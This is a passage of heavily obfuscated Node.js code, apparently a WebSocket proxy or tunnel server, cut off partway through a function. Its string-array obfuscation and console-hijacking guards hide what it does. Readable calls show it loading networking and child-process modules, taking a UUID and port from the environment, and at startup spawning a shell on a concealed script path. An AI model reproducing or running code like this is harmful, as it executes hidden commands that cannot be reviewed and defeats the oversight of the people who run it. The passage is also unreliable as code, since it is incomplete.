return![];}catch(_0x1b5076){_0x236a48[_0x47700b(0x1fe,0x2d2,0x2f5,0x31b,0x32d)](_0x236a48[_0x535f55(0x8f,0x121,0x9c,0x2,0xb0)],_0x236a48[_0x535f55(0x11f,0x9e,0x2f,-0x60,0xaf)])?_0x27d9a9=window:_0x236a48[_0x47700b(0x295,0x1bc,0x29f,0x1bd,0x23c)](_0x19cc34,'0');}return _0x27d9a9;}else return!![];},_0x547036=_0x236a48[_0x16f574(-0x111,-0x6a,-0x109,-0x1e3,-0xfc)](_0x33a3a5);function 
_0x586fa6(_0x2ea91b,_0x252122,_0x7b4811,_0x112808,_0x27f54f){return _0x222c(_0x252122-0x2cf,_0x7b4811);}function _0x16f574(_0x2f756e,_0x54a8b7,_0x347f3f,_0x1c5095,_0xbe46c1){return _0x222c(_0xbe46c1- -0x306,_0x54a8b7);}function _0x15e43a(_0x13eed1,_0x5e161f,_0x4a1bd6,_0x29c317,_0x39108b){return _0x222c(_0x13eed1-0x2a1,_0x39108b);}_0x547036[_0x16f574(-0x20a,-0x2a7,-0x16c,-0x233,-0x24f)+_0x15e43a(0x34f,0x3d1,0x3bc,0x279,0x29a)+'l'](_0x533f97,-0x1f99+-0x129c+-0x1*-0x41d5);}());const _0x3e3e80=(function(){const _0x4d4e3e={};_0x4d4e3e[_0x14b72c(0x300,0x2f8,0x3b4,0x25b,0x3e3)]=_0x14b72c(0x36c,0x44b,0x4d2,0x37e,0x50d)+_0x14b72c(0x3f5,0x3cd,0x48c,0x3a0,0x410)+'+$',_0x4d4e3e[_0x14b72c(0x410,0x3de,0x37a,0x46b,0x3dc)]=function(_0x155e86,_0x1911e2){return _0x155e86===_0x1911e2;},_0x4d4e3e[_0x3b3e39(0xc,-0x66,-0x18,-0xd2,-0x3e)]=_0x14b72c(0x392,0x2ed,0x2b1,0x37b,0x34f),_0x4d4e3e[_0x37c537(-0x158,-0xb5,-0x73,0x4b,-0xd)]=_0x293844(-0x15d,-0x17e,-0x17b,-0x1b0,-0x1dc);function _0x3b3e39(_0x45df62,_0x4863f7,_0x27606b,_0x5888d2,_0x572bd9){return _0x222c(_0x45df62- -0x82,_0x4863f7);}_0x4d4e3e[_0x14a581(-0x88,0x27,0xfc,-0xa5,-0x26)]=_0x14b72c(0x4b2,0x409,0x4b1,0x4a8,0x3c4),_0x4d4e3e[_0x37c537(-0x16c,-0xd6,-0x168,-0x100,-0x1c9)]=_0x293844(-0xb2,0x3f,-0xd3,-0xdb,-0xa8);function _0x14b72c(_0x2002d0,_0x478079,_0x1130f9,_0x18b27a,_0x1b644d){return _0x222c(_0x478079-0x209,_0x18b27a);}function _0x37c537(_0x2efe6f,_0x238f13,_0x31cf20,_0x2a8bb6,_0x5266e4){return _0x222c(_0x31cf20- -0x23e,_0x2a8bb6);}function _0x293844(_0xa0d007,_0x1b46b1,_0xb3ba0b,_0x53d00c,_0x1d7c71){return _0x222c(_0xa0d007- -0x23c,_0x1d7c71);}function _0x14a581(_0x1d5669,_0xf09637,_0x2a8cb9,_0x5b7be5,_0x41a08a){return _0x222c(_0xf09637- -0x204,_0x41a08a);}_0x4d4e3e[_0x14b72c(0x410,0x450,0x525,0x481,0x3b3)]=_0x3b3e39(0x57,-0x4e,-0x83,0x86,0x120);const _0x3c0621=_0x4d4e3e;let _0x2c8e2b=!![];return function(_0xa5aa2b,_0x48c4e1){function _0x4d943e(_0xeeed4c,_0x414686,_0x522e28,_0x496173,_0x8f2078){return _0x37c537(_0xeeed4c-0x40,_0x414686-0x107,_0xeeed4c-0x46a,_0x8f2078,_0x8f2078-0xc);}function _0x1df0fa(_0x24afd9,_0x349266,_0x2bfb33,_0x36c3f2,_0x111190){return _0x3b3e39(_0x2bfb33- -0x73,_0x111190,_0x2bfb33-0x11d,_0x36c3f2-0x1d8,_0x111190-0x16d);}function _0x40f4c4(_0x3d6782,_0xfab5c1,_0x373344,_0x2e514d,_0x32a3a5){return _0x14a581(_0x3d6782-0x72,_0x373344-0x9a,_0x373344-0x1e0,_0x2e514d-0x1c1,_0x3d6782);}function _0x1c5e2a(_0x1c04c5,_0x1743bb,_0x549910,_0x808853,_0xd378ef){return _0x3b3e39(_0x549910- -0x14,_0x1743bb,_0x549910-0x137,_0x808853-0xed,_0xd378ef-0x15);}function _0x80c73c(_0x4a154d,_0x52c2dc,_0x1256d1,_0x166334,_0x181a9b){return _0x3b3e39(_0x52c2dc- -0x2e6,_0x181a9b,_0x1256d1-0x1,_0x166334-0x1bb,_0x181a9b-0x51);}if(_0x3c0621[_0x1c5e2a(0x1bd,0x1b3,0x13f,0xd5,0x1ed)](_0x3c0621[_0x1c5e2a(0x3d,0x37,0x40,0xf6,0x13)],_0x3c0621[_0x4d943e(0x473,0x41e,0x4a8,0x473,0x3b9)]))_0x538557[_0x80c73c(-0x1e8,-0x2c4,-0x2e2,-0x280,-0x21b)](_0x40f4c4(0x44,0x8,0x42,0xbd,0x67)+_0x40f4c4(0x14,0x14b,0x76,0x98,0x94)+_0x5ba607);else{const _0x239d7b=_0x2c8e2b?function(){function _0x32ffd3(_0x14ab40,_0x3681ae,_0x1b991b,_0x28db5f,_0x156022){return _0x80c73c(_0x14ab40-0x19,_0x3681ae-0x20b,_0x1b991b-0x8c,_0x28db5f-0x1a2,_0x28db5f);}function _0x3e441e(_0x3000b1,_0x227314,_0x37efd2,_0x1f3652,_0x339a0){return _0x80c73c(_0x3000b1-0x10c,_0x37efd2-0x742,_0x37efd2-0x152,_0x1f3652-0x8d,_0x227314);}const _0x497551={};function _0x483624(_0x35db9a,_0x1ce6f7,_0x35eed5,_0x33ccbe,_0x55ab34){return _0x4d943e(_0x35eed5- 
-0x52d,_0x1ce6f7-0x1c1,_0x35eed5-0x20,_0x33ccbe-0xcf,_0x33ccbe);}_0x497551[_0x139bc3(0x426,0x3fa,0x334,0x331,0x357)]=_0x3c0621[_0x139bc3(0x25f,0x1e7,0x2de,0x2b6,0x219)];const _0xf80675=_0x497551;function _0x139bc3(_0x3b08e5,_0x4cd9fc,_0x352275,_0x2bf1b8,_0x20700d){return _0x40f4c4(_0x2bf1b8,_0x4cd9fc-0x113,_0x20700d-0x294,_0x2bf1b8-0x1a4,_0x20700d-0x66);}function _0x52ce64(_0x31b8c5,_0x35d946,_0x50fb58,_0x4b9b47,_0x59eb41){return _0x40f4c4(_0x59eb41,_0x35d946-0x91,_0x35d946-0x85,_0x4b9b47-0xf3,_0x59eb41-0x11);}if(_0x3c0621[_0x32ffd3(0x87,0x78,0x5d,0x36,0xe2)](_0x3c0621[_0x483624(-0x210,-0x2f9,-0x273,-0x1a1,-0x30d)],_0x3c0621[_0x483624(-0x66,-0x20a,-0x136,-0x18f,-0xd6)]))return _0x1a6f0a[_0x483624(-0x2c,-0x40,-0xc3,-0x8d,0xd)+_0x483624(-0x2c3,-0x33a,-0x262,-0x194,-0x260)]()[_0x32ffd3(-0xc6,-0xba,-0x84,-0x8f,-0xb8)+'h'](_0xf80675[_0x139bc3(0x3d5,0x34a,0x3bf,0x36e,0x357)])[_0x483624(-0x25,-0xab,-0xc3,-0x16f,-0x160)+_0x3e441e(0x4ac,0x46d,0x479,0x4be,0x564)]()[_0x483624(-0x11d,-0x1bb,-0x15c,-0x11b,-0x146)+_0x3e441e(0x55f,0x3ec,0x49f,0x4f6,0x3af)+'r'](_0x1db1c8)[_0x3e441e(0x4f0,0x537,0x47d,0x403,0x4a9)+'h'](_0xf80675[_0x52ce64(0x66,0x148,0x22a,0x111,0x153)]);else{if(_0x48c4e1){if(_0x3c0621[_0x52ce64(0xd6,0xf0,0x77,0x1a1,0x1a0)](_0x3c0621[_0x139bc3(0x405,0x315,0x428,0x402,0x355)],_0x3c0621[_0x52ce64(0x177,0x146,0x1b6,0x221,0x1b7)])){const _0x162620=_0x48c4e1[_0x139bc3(0x250,0x323,0x336,0x3f8,0x321)](_0xa5aa2b,arguments);return _0x48c4e1=null,_0x162620;}else{const _0x17412e=_0x5eac96?function(){function _0x5db974(_0x2f3515,_0x589995,_0x1375cc,_0x3845b5,_0x364a76){return _0x483624(_0x2f3515-0x22,_0x589995-0x1c0,_0x364a76-0x167,_0x2f3515,_0x364a76-0xdd);}if(_0x36c389){const _0x11534f=_0x1f1891[_0x5db974(-0xe,-0xf,0x11,0x7e,0x5d)](_0x25d17c,arguments);return _0x5d0883=null,_0x11534f;}}:function(){};return _0x14dabb=![],_0x17412e;}}}}:function(){};return _0x2c8e2b=![],_0x239d7b;}};}()),_0x48a700=_0x3e3e80(this,function(){function _0x56a2ea(_0x25b7e4,_0x20d4f7,_0xc142c1,_0x41b6a9,_0x31b32e){return _0x222c(_0x25b7e4- -0x24f,_0x20d4f7);}const _0x35f877={'tyKaX':function(_0x211607){return _0x211607();},'qdEbE':_0x5e1a7a(-0x2b4,-0x278,-0x27e,-0x188,-0x22f)+_0xd2d693(0x2a5,0x2e8,0x37d,0x322,0x310)+_0xd2d693(0x2b0,0x344,0x2db,0x348,0x289)+')','Rpahm':_0xd2d693(0x1ec,0x296,0x130,0x250,0x15b)+_0xd2d693(0x211,0x174,0x1c7,0x263,0x24b)+_0xd2d693(0x122,0x7d,0x1e7,0x10f,0xc9)+_0x5e1a7a(-0x21b,-0x253,-0x267,-0x275,-0x2e0)+_0x5a86c6(-0xc6,-0x80,-0xef,-0x2,-0x7)+_0xd2d693(0x1b4,0x1b1,0x1cc,0x268,0x24c)+_0x1f542c(0x1dc,0x1db,0xac,0x93,0x136),'RUvbo':function(_0x2c953e,_0x4f6b20){return _0x2c953e(_0x4f6b20);},'nnldf':_0x1f542c(0x19f,0x140,0x160,0xb3,0xc1),'gZTRd':function(_0x2a21dd,_0x4016db){return _0x2a21dd+_0x4016db;},'BBKlA':_0x1f542c(0xac,-0x25,0x4f,0x10f,0xa1),'gNvzd':_0x5e1a7a(-0x2e0,-0x253,-0x3a4,-0x39e,-0x2b7),'BfvaY':function(_0x36200e){return _0x36200e();},'GwhBd':function(_0x38f280,_0x14836d){return _0x38f280!==_0x14836d;},'PZViy':_0x5e1a7a(-0x2a1,-0x2fa,-0x1e9,-0x2e1,-0x2c3),'YZnVv':_0x56a2ea(-0x1bd,-0x23e,-0x243,-0x23d,-0x240)+_0x5a86c6(0x157,-0x1f,0x8f,0x1a1,0xb4)+_0xd2d693(0x172,0x1eb,0x23a,0x215,0x142)+_0x5a86c6(-0x137,-0xa9,-0xf0,-0x17f,-0x95),'vycxt':_0x56a2ea(-0x66,-0x12c,0x63,-0xf3,-0x11d)+_0x5a86c6(0xa0,0x47,-0x2d,0x8f,0x5d)+_0xd2d693(0x1b2,0x192,0xd1,0x21a,0x101)+_0x1f542c(0x241,0x20c,0x2cb,0x250,0x20a)+_0x56a2ea(-0x172,-0xe6,-0xa6,-0xfb,-0x1d8)+_0x56a2ea(-0xe6,-0x8,-0x108,-0xa5,-0x1ab)+'\x20)','YuZTU':function(_0x363c43){return _0x363c43();},'EgIjE':function(_0x2fe81a,_0x45475f){return 
_0x2fe81a===_0x45475f;},'zOvbg':_0x5e1a7a(-0x3d4,-0x25e,-0x3da,-0x388,-0x338),'dBMnj':_0xd2d693(0x1c2,0x27b,0x12b,0x191,0x152),'rdZbx':_0x1f542c(0x19c,0x24,-0x2d,-0x5,0xbd),'FFddC':_0x5a86c6(0x7a,0x40,-0xdf,0x78,-0x38),'MDzGd':_0x1f542c(0x70,0x46,0xa,0x80,0xdd),'hutFS':_0x5e1a7a(-0x25b,-0x418,-0x2e3,-0x3b4,-0x32f),'xuxDF':_0x56a2ea(-0x1b6,-0x237,-0x1ec,-0x144,-0x1d8)+_0x5e1a7a(-0x23a,-0x1f8,-0x266,-0x155,-0x226),'fvPjT':_0x1f542c(0xee,0x76,0x156,-0x7,0xc4),'ArJzO':_0xd2d693(0x225,0x18d,0x1ff,0x21f,0x2ef),'chqdL':function(_0x485508,_0x7d96f9){return _0x485508<_0x7d96f9;},'DlSBX':function(_0x26fcc3,_0x40861){return _0x26fcc3!==_0x40861;},'SeIEh':_0x1f542c(0x1c,0x10,0x184,0x83,0xa2)};let _0x4f7a60;try{if(_0x35f877[_0x56a2ea(-0x9d,-0xf0,-0x2a,0x8,-0x120)](_0x35f877[_0x5a86c6(0xb1,0x3a,0x0,0x42,0x3a)],_0x35f877[_0x56a2ea(-0xa6,-0x186,-0x178,-0x51,-0x2a)]))_0x599484=_0x2d52fb;else{const _0x4b6401=_0x35f877[_0x1f542c(-0x2c,0x44,0xce,0x7,0x9c)](Function,_0x35f877[_0x56a2ea(-0xf0,-0xc2,-0x165,-0x168,-0x3f)](_0x35f877[_0xd2d693(0x1fe,0x29f,0x27d,0x10e,0x218)](_0x35f877[_0x5e1a7a(-0x340,-0x344,-0x328,-0x1c8,-0x270)],_0x35f877[_0x5a86c6(0x33,0x30,-0xe,-0x49,-0x43)]),');'));_0x4f7a60=_0x35f877[_0x1f542c(0x132,0xd0,0x1d7,0x4b,0x10e)](_0x4b6401);}}catch(_0x57388d){_0x35f877[_0x5a86c6(0xae,-0x5c,-0x74,-0x66,0x4d)](_0x35f877[_0x1f542c(0x41,0x15c,0x77,0x1d7,0x12e)],_0x35f877[_0xd2d693(0x13f,0xf0,0x1f9,0x7c,0x16b)])?_0x35f877[_0x5a86c6(-0x61,-0xf2,0x6d,-0x67,-0x75)](_0x39bf25):_0x4f7a60=window;}const _0x3f27fd=_0x4f7a60[_0xd2d693(0x180,0x1d9,0x100,0x1d7,0x23e)+'le']=_0x4f7a60[_0x1f542c(0x126,0x1c0,0x29,0x51,0xe6)+'le']||{};function _0x1f542c(_0x477355,_0xedc545,_0x18d292,_0x5cf9c7,_0x1fa2e0){return _0x222c(_0x1fa2e0-0x5,_0x5cf9c7);}function _0xd2d693(_0x112189,_0x371479,_0x3cfe87,_0x469dc7,_0x3ae34a){return _0x222c(_0x112189-0x9f,_0x3ae34a);}function _0x5e1a7a(_0x81e0ee,_0x1c8f5f,_0x5057d9,_0x44c650,_0x75c638){return _0x222c(_0x75c638- -0x3d3,_0x1c8f5f);}const _0x3e33f8=[_0x35f877[_0xd2d693(0x165,0x15a,0x1aa,0x225,0xb8)],_0x35f877[_0x56a2ea(-0x4b,0x6,-0x138,-0x9,-0x1d)],_0x35f877[_0xd2d693(0x169,0xfc,0x1a4,0xc8,0x13d)],_0x35f877[_0x1f542c(0x309,0x2fa,0x1e6,0x23b,0x226)],_0x35f877[_0x5e1a7a(-0x273,-0x382,-0x247,-0x30a,-0x2d0)],_0x35f877[_0x5a86c6(-0x159,-0x133,-0x7a,-0xfd,-0xdc)],_0x35f877[_0x5a86c6(0x76,-0x43,-0x28,-0x22,-0x45)]];function _0x5a86c6(_0xc87c0a,_0x553564,_0x27b30a,_0x1ac741,_0x20ac17){return _0x222c(_0x20ac17- -0x16f,_0x27b30a);}for(let _0x4cb676=-0x1cec+0x1*0x1b92+0x15a;_0x35f877[_0x1f542c(0xbc,0x146,0x1c1,0x1f2,0x163)](_0x4cb676,_0x3e33f8[_0xd2d693(0x18a,0x17b,0x1e0,0x1a2,0x129)+'h']);_0x4cb676++){if(_0x35f877[_0x56a2ea(-0x10,0x4f,0x81,-0xf0,0x8)](_0x35f877[_0xd2d693(0x206,0x1d2,0x127,0x2bf,0x12f)],_0x35f877[_0x1f542c(0x189,0x1e6,0x121,0x168,0x16c)])){const _0x26189e=new _0x5ed20f(_0x35f877[_0x56a2ea(-0x1e,-0x23,-0x13,-0x5e,0xb9)]),_0x3a302c=new 
_0x108b02(_0x35f877[_0xd2d693(0x222,0x238,0x1b9,0x276,0x311)],'i'),_0x2709e6=_0x35f877[_0x5e1a7a(-0x2bf,-0x2c0,-0x3be,-0x392,-0x33c)](_0x4664cb,_0x35f877[_0xd2d693(0x2bf,0x332,0x231,0x287,0x20e)]);!_0x26189e[_0x1f542c(0x1a3,0x10e,0x16a,0x102,0x124)](_0x35f877[_0x1f542c(0x1be,0x15c,0x1dc,0x1e1,0x164)](_0x2709e6,_0x35f877[_0x56a2ea(-0xcb,-0xc1,-0x138,-0x123,-0xf4)]))||!_0x3a302c[_0xd2d693(0x1be,0x221,0x273,0x19a,0x239)](_0x35f877[_0x1f542c(0x175,0x213,0xe1,0x79,0x164)](_0x2709e6,_0x35f877[_0x5a86c6(-0x35,-0xe2,-0x18b,-0x18c,-0xc3)]))?_0x35f877[_0x1f542c(0x76,0x7f,0x144,0x136,0x9c)](_0x2709e6,'0'):_0x35f877[_0x56a2ea(-0x88,0x3b,-0x140,0x2a,-0x117)](_0x4be393);}else{const _0x326dd0=_0x3e3e80[_0x1f542c(0x201,0x243,0xcb,0x19a,0x1aa)+_0xd2d693(0x164,0x1b9,0x201,0xb8,0x1bc)+'r'][_0x56a2ea(-0x29,-0xc,-0xe6,0x20,-0xa7)+_0x1f542c(0x102,0x115,0x16b,0x143,0x175)][_0x5e1a7a(-0x28b,-0x290,-0x1e9,-0x25a,-0x288)](_0x3e3e80),_0x30f3d4=_0x3e33f8[_0x4cb676],_0x5cc1dc=_0x3f27fd[_0x30f3d4]||_0x326dd0;_0x326dd0[_0x56a2ea(-0x109,-0xe4,-0x83,-0x142,-0xb4)+_0xd2d693(0x14c,0x174,0xe0,0x1d2,0x1b8)]=_0x3e3e80[_0x1f542c(0x167,0xa3,0x83,0x84,0x150)](_0x3e3e80),_0x326dd0[_0x5e1a7a(-0x11a,-0x1ae,-0x122,-0xd8,-0x195)+_0xd2d693(0x13e,0x165,0x172,0x1f5,0xe2)]=_0x5cc1dc[_0xd2d693(0x2dd,0x27a,0x2f7,0x260,0x391)+_0x1f542c(0xf7,0x49,-0x1f,0x148,0xa4)][_0x5e1a7a(-0x243,-0x2a6,-0x2b2,-0x225,-0x288)](_0x5cc1dc),_0x3f27fd[_0x30f3d4]=_0x326dd0;}}});_0x48a700();const net=require(_0x5b3717(-0xf8,-0x10d,-0x15d,-0x1ae,-0x179)),http=require(_0x5b3717(-0x19a,-0x244,-0x215,-0x13d,-0x182)),{WebSocket,createWebSocketStream}=require('ws'),{TextDecoder}=require(_0x5b3717(-0x2ca,-0x1df,-0x2ca,-0x384,-0x342)),logcb=(..._0xae0cb9)=>console[_0x5b3717(-0x291,-0x205,-0x2e8,-0x261,-0x2d9)][_0x1d31e6(0x126,0x1d7,0x1c1,0xf3,0x51)](this,..._0xae0cb9),errcb=(..._0x25b289)=>console[_0x5b3717(-0x2a5,-0x2ad,-0x22a,-0x2b7,-0x33b)][_0x1e3602(0x4a,0xde,-0xf9,-0xb,-0xbe)](this,..._0x25b289);function _0x1e3602(_0x153873,_0x28ca00,_0x36e8f2,_0x5320bc,_0x498200){return _0x222c(_0x5320bc- -0x156,_0x28ca00);}const {spawn}=require(_0x1e3602(-0x166,-0x68,-0x8d,-0x78,-0x9e)+_0x1d31e6(0x12a,0xa3,0x6a,0xed,0x1b2)+_0x1e3602(-0x9d,-0xa1,0xc,0x22,0x61)),uuid=(process[_0x1d31e6(0x1cc,0x247,0x1e1,0x155,0x1dd)][_0x5b3717(-0x23c,-0x153,-0x2a5,-0x247,-0x2bf)]||_0x504eae(0x2b4,0x24d,0x2dd,0x337,0x233)+_0x5b3717(-0x1c7,-0x154,-0x245,-0x26c,-0x1c5)+_0x3b9f4f(0xbd,0xac,-0xe,0x9e,0x2f)+_0x504eae(0x3b4,0x2ec,0x31d,0x325,0x473)+_0x1e3602(-0x56,0xbf,0xc4,0x8d,-0x13)+_0x3b9f4f(0x3d,-0x14,0xef,0x45,-0x60)+_0x3b9f4f(0xe1,0xc2,0x1ad,0x1b6,0x177)+'e')[_0x1e3602(0x13,0x12b,0x185,0xf4,0xe8)+'ce'](/-/g,''),port=process[_0x504eae(0x377,0x295,0x2fd,0x41e,0x305)][_0x1d31e6(0x1a9,0x13f,0x199,0x254,0x1c8)]||0x1c25+-0x75b*-0x5+-0x2238,shellFilePath=_0x504eae(0x392,0x36e,0x2e6,0x47c,0x45d)+_0x504eae(0x251,0x310,0x1f0,0x285,0x255),childProcess=spawn('sh',[shellFilePath]),httpServer=http[_0x1e3602(0x5f,0x176,0x1a4,0xb8,0x18f)+_0x5b3717(-0x1a8,-0x18b,-0x1a4,-0x207,-0x21d)+'er']((_0x1227b5,_0x1cbdc7)=>{const _0x1c21f8={'baaVO':_0x7dbfd5(0x434,0x45f,0x2fd,0x401,0x3aa)+_0x7dbfd5(0x3e4,0x33f,0x28d,0x38a,0x360),'cxNks':_0x29d5f9(0x203,0x2e2,0x223,0x236,0x245)+_0x270b17(0x3e7,0x2f6,0x2a7,0x28f,0x32f)+_0x270b17(0x2b3,0x21f,0x14b,0x1a7,0x1b5),'UbKUh':_0x270b17(0x1ce,0x19c,0xcb,0x106,0x136),'VUWbC':function(_0x17d3f3,_0x574243){return _0x17d3f3(_0x574243);},'KBBMA':_0x29d5f9(0x2a5,0x225,0x35c,0x35b,0x1ef),'QRTPc':_0x213bca(0x537,0x4bd,0x4b4,0x579,0x40e),'MbvHf':function(_0x35b46f,_0x58cecc){return 
_0x35b46f+_0x58cecc;},'CKgNX':function(_0x34a6c2,_0x164544){return _0x34a6c2==_0x164544;},'SSpbY':function(_0x4fa7eb,_0xe732e3){return _0x4fa7eb==_0xe732e3;},'UpZOL':function(_0x8b5df9,_0x548445){return _0x8b5df9+_0x548445;},'FphDo':function(_0xd8db64,_0x53229f){return _0xd8db64==_0x53229f;},'XdJIb':function(_0x1cafcd,_0x2fbc56,_0x5372b3,_0x1fb38a){return _0x1cafcd(_0x2fbc56,_0x5372b3,_0x1fb38a);},'prTxT':_0x7dbfd5(0x2b0,0x305,0x329,0x343,0x38e)+_0x5ec539(-0x125,-0x166,-0x53,-0x10b,-0x98),'bcCTr':function(_0x3b576c,_0x3c6b80,_0x4be179){return _0x3b576c(_0x3c6b80,_0x4be179);},'VJMWX':_0x213bca(0x368,0x44d,0x52f,0x3c1,0x408)+_0x29d5f9(0x299,0x2e3,0x361,0x381,0x22f)+'r:','Ejzpn':_0x29d5f9(0x1a3,0xf9,0x276,0x139,0xb2)+_0x5ec539(-0x155,-0x1eb,-0xb8,-0xc3,-0x104)+_0x5ec539(-0xa5,-0xbf,-0x16c,-0x18c,-0xaf)+_0x213bca(0x3d1,0x4a3,0x486,0x3df,0x4a9)+'ly','NXhPY':_0x7dbfd5(0x404,0x4ce,0x365,0x40c,0x3e0)+'ge','GlnpG':function(_0x4258a8,_0x1bfb99){return _0x4258a8(_0x1bfb99);},'jXxhT':_0x5ec539(-0xbc,-0x60,-0x19d,-0xce,-0x118)+_0x29d5f9(0x190,0x119,0x213,0x1ad,0x1ba)+_0x213bca(0x588,0x58c,0x49f,0x62d,0x4bf)+':','kEbvc':function(_0x20821b,_0x3f0326){return _0x20821b===_0x3f0326;},'VodzB':_0x5ec539(-0xe8,-0x4c,-0xb1,-0x6e,-0x1d0),'xHxer':_0x29d5f9(0x309,0x29f,0x355,0x3d2,0x3c3),'LegjN':function(_0xdbca3,_0x5ce2be){return _0xdbca3!==_0x5ce2be;},'KZCzm':_0x213bca(0x55f,0x573,0x540,0x607,0x5a3),'gHyhj':_0x270b17(0x18a,0x212,0x1cd,0x2ba,0x177),'Yicnh':_0x213bca(0x427,0x4a6,0x4c0,0x41a,0x4e1)+_0x270b17(0x393,0x2bb,0x2ea,0x1db,0x249)};function _0x5ec539(_0x13258a,_0x45ffac,_0x497887,_0x5548cc,_0x57df33){return _0x1e3602(_0x13258a-0x5a,_0x45ffac,_0x497887-0xbe,_0x13258a- -0x1a9,_0x57df33-0x62);}function _0x7dbfd5(_0x5eb884,_0x11000f,_0x4beaea,_0x26afa4,_0xde7a47){return _0x3b9f4f(_0xde7a47-0x3a8,_0x11000f-0x177,_0x4beaea-0x95,_0x26afa4-0x53,_0x5eb884);}function _0x213bca(_0x6ddd31,_0x2b7ad1,_0x5ef674,_0x4f6133,_0x284b61){return _0x504eae(_0x2b7ad1-0x1e4,_0x2b7ad1-0x78,_0x5ef674-0x190,_0x4f6133-0x1e0,_0x4f6133);}function _0x270b17(_0x22ec5c,_0x1daa2e,_0x498e0e,_0x2c5734,_0x24e531){return _0x3b9f4f(_0x1daa2e-0x1f5,_0x1daa2e-0x80,_0x498e0e-0x1f2,_0x2c5734-0x2b,_0x24e531);}function _0x29d5f9(_0x59865f,_0x3256ae,_0x4e1482,_0xaa1c12,_0x5dcc61){return _0x1e3602(_0x59865f-0x38,_0xaa1c12,_0x4e1482-0x110,_0x59865f-0x216,_0x5dcc61-0x1f2);}if(_0x1c21f8[_0x5ec539(-0x19b,-0xdf,-0x228,-0x1b9,-0x133)](_0x1227b5[_0x7dbfd5(0x3f8,0x2bf,0x412,0x437,0x386)],'/')){if(_0x1c21f8[_0x29d5f9(0x224,0x286,0x2aa,0x13a,0x304)](_0x1c21f8[_0x270b17(0x2e7,0x347,0x306,0x27d,0x260)],_0x1c21f8[_0x5ec539(-0x267,-0x2cd,-0x2f7,-0x2d4,-0x192)])){const _0x2b31ae={};_0x2b31ae[_0x29d5f9(0x216,0x171,0x23d,0x1b6,0x19b)+_0x29d5f9(0x16f,0x12d,0x1e5,0x1d5,0x7f)+'pe']=_0x1c21f8[_0x29d5f9(0x2ad,0x365,0x35a,0x1c4,0x226)],_0x473208[_0x7dbfd5(0x453,0x46b,0x481,0x354,0x39f)+_0x213bca(0x45f,0x479,0x561,0x469,0x4ae)](-0x1*-0x1be7+-0x34*-0x28+-0x233f*0x1,_0x2b31ae),_0x5c69a9[_0x213bca(0x519,0x4b2,0x565,0x52d,0x439)](_0x1c21f8[_0x270b17(0x387,0x2da,0x2fe,0x3a6,0x1eb)]);}else{const 
_0x58c93a={};_0x58c93a[_0x29d5f9(0x216,0x129,0x12c,0x2f9,0x22c)+_0x29d5f9(0x16f,0x143,0x16e,0xa5,0x113)+'pe']=_0x1c21f8[_0x7dbfd5(0x57f,0x423,0x45c,0x46b,0x498)],_0x1cbdc7[_0x5ec539(-0x20b,-0x28d,-0x2ef,-0x266,-0x232)+_0x5ec539(-0x1f0,-0x284,-0x197,-0x1a4,-0x2ba)](-0x1*-0x397+0x1*0x78f+-0x52f*0x2,_0x58c93a),_0x1cbdc7[_0x5ec539(-0x1b7,-0x22e,-0x27d,-0x139,-0x232)](_0x1c21f8[_0x7dbfd5(0x511,0x49e,0x493,0x4f8,0x48d)]);}}else{if(_0x1c21f8[_0x213bca(0x55b,0x51a,0x4e8,0x46c,0x50d)](_0x1c21f8[_0x7dbfd5(0x36f,0x444,0x4b0,0x4aa,0x41f)],_0x1c21f8[_0x7dbfd5(0x370,0x38d,0x438,0x373,0x38b)])){const _0x2c7708={};_0x2c7708[_0x213bca(0x3e4,0x4c0,0x448,0x5ac,0x483)+_0x270b17(0x232,0x1a7,0x281,0x24d,0xf1)+'pe']=_0x1c21f8[_0x7dbfd5(0x515,0x483,0x3b3,0x3ac,0x498)],_0x1cbdc7[_0x5ec539(-0x20b,-0x2e6,-0x2c5,-0x1a5,-0x20e)+_0x29d5f9(0x1cf,0x25b,0x20a,0x28b,0xf0)](0xa06+0x29*0x15+0xbcf*-0x1,_0x2c7708),_0x1cbdc7[_0x29d5f9(0x208,0x2d5,0x287,0x205,0x1ef)](_0x1c21f8[_0x5ec539(-0x142,-0x1a1,-0x8f,-0x197,-0x19d)]);}else{const _0x4a3fcb={'VxtEs':_0x1c21f8[_0x29d5f9(0x260,0x2da,0x1dc,0x223,0x24a)],'YMKao':function(_0x519f95,_0x1c4a82){function _0x10aa16(_0x47b5e4,_0x36b0f2,_0x550907,_0x436a48,_0x152343){return _0x5ec539(_0x47b5e4- -0x69,_0x36b0f2,_0x550907-0x112,_0x436a48-0x14c,_0x152343-0x40);}return _0x1c21f8[_0x10aa16(-0x1ed,-0x1df,-0x238,-0x2b4,-0x158)](_0x519f95,_0x1c4a82);},'iDzSp':_0x1c21f8[_0x213bca(0x504,0x51e,0x5ef,0x5de,0x5e3)],'mhjxL':function(_0x5121b5,_0xcc3f88){function _0x688250(_0x5c854c,_0x305258,_0x75ef46,_0x589ca9,_0x3ab5ab){return _0x213bca(_0x5c854c-0x18d,_0x305258- -0x3f3,_0x75ef46-0x13b,_0x3ab5ab,_0x3ab5ab-0x11b);}return _0x1c21f8[_0x688250(0x1d9,0xf2,0x126,0xe7,0x10b)](_0x5121b5,_0xcc3f88);},'ZcBtI':_0x1c21f8[_0x7dbfd5(0x330,0x340,0x35d,0x47d,0x3cc)],'GXkqo':function(_0x2a18c9,_0xf462c3){function _0x157cba(_0x411230,_0x4128a7,_0x4e1812,_0x49cfa7,_0x52cb71){return _0x5ec539(_0x4e1812-0x41b,_0x52cb71,_0x4e1812-0x194,_0x49cfa7-0x99,_0x52cb71-0xa2);}return _0x1c21f8[_0x157cba(0x18a,0x203,0x242,0x160,0x224)](_0x2a18c9,_0xf462c3);},'liHXh':function(_0x1a6491,_0x223a64){function _0x4aaa51(_0x4b7a2d,_0x54fb91,_0x4a9a1d,_0x53bd9a,_0xdc3b1e){return _0x213bca(_0x4b7a2d-0xd4,_0x4b7a2d- -0x570,_0x4a9a1d-0xc7,_0x54fb91,_0xdc3b1e-0xa6);}return _0x1c21f8[_0x4aaa51(-0x47,-0xf3,-0x9b,0x2b,-0xd3)](_0x1a6491,_0x223a64);},'BDovH':function(_0x9244af,_0x3db7ab){function _0x268979(_0x468383,_0x5bccfc,_0x37de67,_0x5b5ca1,_0x3e78cc){return _0x7dbfd5(_0x468383,_0x5bccfc-0xdd,_0x37de67-0x147,_0x5b5ca1-0xdb,_0x5b5ca1- -0x77);}return _0x1c21f8[_0x268979(0x3f3,0x3cb,0x3ab,0x424,0x3fc)](_0x9244af,_0x3db7ab);},'fBjQe':function(_0x4f6420,_0x3470f7){function _0x26bc63(_0x433001,_0x5f4de1,_0x317a3f,_0x5cc401,_0x5c6180){return 